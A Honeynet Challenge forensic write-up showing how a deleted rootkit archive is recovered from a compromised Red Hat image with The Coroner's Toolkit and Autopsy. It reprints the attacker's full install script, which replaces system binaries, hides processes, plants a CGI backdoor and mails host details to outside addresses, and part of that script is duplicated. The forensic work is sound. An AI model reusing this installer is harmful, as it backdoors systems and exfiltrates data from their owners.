May 15th, 2001 Honeynet Challenge.
Matt Fiddler <matt.fiddler@hli.com>

Step by Step:

1. Acquire compressed image from:
http://project.honeynet.org/scans/scan15/honeynet.tar.gz.

2. Mount image read only on a Linux-system.

# mkdir /honeynet
# mount -o ro,loop,nodev,noexec honeypot.hda8.dd /honeynet

3. Download and install The Coroners Toolkit, TCTUTILS, autopsy. Since the README's

for all the packages are self explanatory, I am only including links to these files.

The Coroners Toolkit http://www.porcupine.org/forensics/tct.html

TCT Utils http://www.cerias.purdue.edu/homes/carrier/forensiscs

Autopsy http://www.cerias.purdue.edu/homes/carrier/forensiscs

4. After the above products are installed launch autopsy to begin the analysis:

# autopsy 8888 localhost
Autopsy Forensic Browser ver 1.0
Investigator: Quincy
Paste this as your browser URL on localhost:
localhost:8888/3004636400/autopsy

5. Pasting the URL in your browser will bring you to the Autopsy main menu:

Select both boxes under the image and click on "Enter the Lab":

You are now presented with a "File" listing of all deleted files in the "/" partition. Scrolling down to the bottom you will be presented with the most recently deleted files and directories. Referencing the MAC time stamps we see a single file, lk.tgz, that was modified, accessed and created in "/" on March 15th, 2001. This file looks intriguing, so we will restore it for further investigation.

6. We only need the inode number from the deleted file in question to recover this file using icat from The Coroners Toolkit:

# icat /honeynet/honeypot.hda8.dd 23 > /honeynet/lk.tgz

7. Uncompressing this file creates a directory /last, with the following contents:

# ls -ltr /honeynet/last

total 1472

-rwxr-xr-x 1 1031 users 1345 Sep 9 1999 cleaner*
-rw------- 1 1031 users 512 Oct 22 2000 ssh_random_seed
-rw-r--r-- 1 1031 users 344 Oct 22 2000 ssh_host_key.pub
-rw------- 1 1031 users 540 Oct 22 2000 ssh_host_key
-rw-r--r-- 1 1031 users 880 Oct 22 2000 ssh_config
-rw-r--r-- 1 1031 users 3278 Jan 27 10:11 inetd.conf
-rw-r--r-- 1 1031 users 11407 Jan 27 10:11 services
-rwxr-xr-x 1 1031 users 632066 Feb 26 09:46 mkxfs*
-rwx------ 1 1031 users 7165 Feb 26 10:22 linsniffer*
-rwxr-xr-x 1 1031 users 4060 Feb 26 10:22 sense*
-rwx------ 1 1031 users 8268 Feb 26 10:22 sl2*
-rwxr-xr-x 1 1031 users 4620 Feb 26 10:23 last.cgi*
-rwxr-xr-x 1 1031 users 33280 Feb 26 10:23 ps*
-rwxr-xr-x 1 1031 users 35300 Feb 26 10:23 netstat*
-rwxr-xr-x 1 1031 users 19840 Feb 26 10:23 ifconfig*
-rwxr-xr-x 1 1031 users 53588 Feb 26 10:23 top*
-rwx------ 1 1031 users 75 Feb 26 10:24 logclear*
-rwxr-xr-x 1 1031 users 79 Feb 26 10:28 lsattr*
-rw-r--r-- 1 1031 users 688 Feb 26 10:29 sshd_config
-rw-r--r-- 1 1031 users 1 Feb 26 10:29 pidfile
-rw-r--r-- 1 root root 708 Mar 2 22:05 s
-rwx------ 1 1031 users 3713 Mar 2 22:08 install*
-rwxr-xr-x 1 1031 users 611931 Feb 8 2002 ssh*

We have found the contents of our Root Kit!

A quick cat of /last/install and we can follow the installation of this Root Kit on our compromised system.

# cat /last/install

#!/bin/sh
clear
unset HISTFILE
echo "********* Instalarea Rootkitului A Pornit La Drum *********"
echo "********* Mircea SUGI PULA ********************************"
echo "********* Multumiri La Toti Care M-Au Ajutat **************"
echo "********* Lemme Give You A Tip : **************************"
echo "********* Ignore everything, call your freedom ************"
echo "********* Scream & swear as much as you can ***************"
echo "********* Cuz anyway nobody will hear you and no one will *"
echo "********* Care about you **********************************"
echo
echo
chown root.root *
if [ -f /usr/bin/make ]; then
echo "Are Make !"
else
echo "Nu Are Make !"
fi
if [ -f /usr/bin/gcc ]; then
echo "Are Gcc !"
else
echo "Nu Are Gcc !"
fi
if [ -f /usr/sbin/sshd/ ]; then
echo "Are Ssh !"
else
echo "Nu Are Ssh !"
fi
echo -n "* Inlocuim nestat ... alea alea "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
cp -f mkxfs /usr/sbin/
echo "* Gata..."
echo -n "* Dev... "
echo
echo
touch /dev/rpm
>/dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 sshdu" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
echo "3 smurf" >>/dev/rpm
echo "3 slice" >>/dev/rpm
echo "3 mech" >>/dev/rpm
echo "3 muh" >>/dev/rpm
echo "3 bnc" >>/dev/rpm
echo "3 psybnc" >> /dev/rpm
touch /dev/last
>/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
echo "* Gata"
echo "* Facem Director...Si Mutam Alea.. "
mkdir -p /dev/ida/.drag-on
mkdir -p /dev/ida/".. "
echo "* Copiem ssh si alea"
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. "
rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
touch /dev/ida/.drag-on/tcp.log
touch /dev/ida/".. "/tcp.log
cp -f inetd.conf /etc
cp -f services /etc
killall -HUP inetd
echo
echo
echo
echo "* Adaugam In Startup:) ..."
rm -rf /usr/bin/lsattr
echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
chmod 500 /usr/bin/lsattr
chattr +i /usr/bin/lsattr
/usr/bin/lsattr
sleep 1
if [ -d /home/httpd/cgi-bin ]
then
mv -f last.cgi /home/httpd/cgi-bin/
fi
if [ -d /usr/local/httpd/cgi-bin ]
then
mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin ]
then
mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin ]
then
mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile dorite ..."
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
fi
if [ -d /usr/local/httpd/cgi-bin ]
then
mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin ]
then
mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin ]
then
mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile dorite ..."
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com
echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ."
echo
echo
echo "* G A T A *"
echo
echo "* That Was Nice Last "
cd /
rm -rf last lk.tgz computer lk.tar.gz

8. Returning to our autopsy browser deleted file listing, we can see that the /last directory was also deleted from our compromised system, so we now know that based on MAC time stamps and on the recovery of the deleted Root Kit that the compressed file was uncompressed on our system. But, the question remains, was the Root Kit actually installed?

9. After following through the install script and analyzing the deleted output from autopsy you can quickly determine that the Root Kit was infact "installed" on this compromised system.
The quick correlation I used was the creation of the file "/dev/last" referenced in the install script:

<snip>
touch /dev/last
>/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
</snip>

If you traverse the autopsy file browser through the /dev directory you will locate this file, here is an example of an autopsy ascii report on /dev/last:

Further correlation can be made by comparing MD5 checksums of trojanized binaries to those checksums from original RH install disk.

This completes my step-by-step analysis of the compromised Red Hat system for the March 15, 2001 HoneyNet Challenge.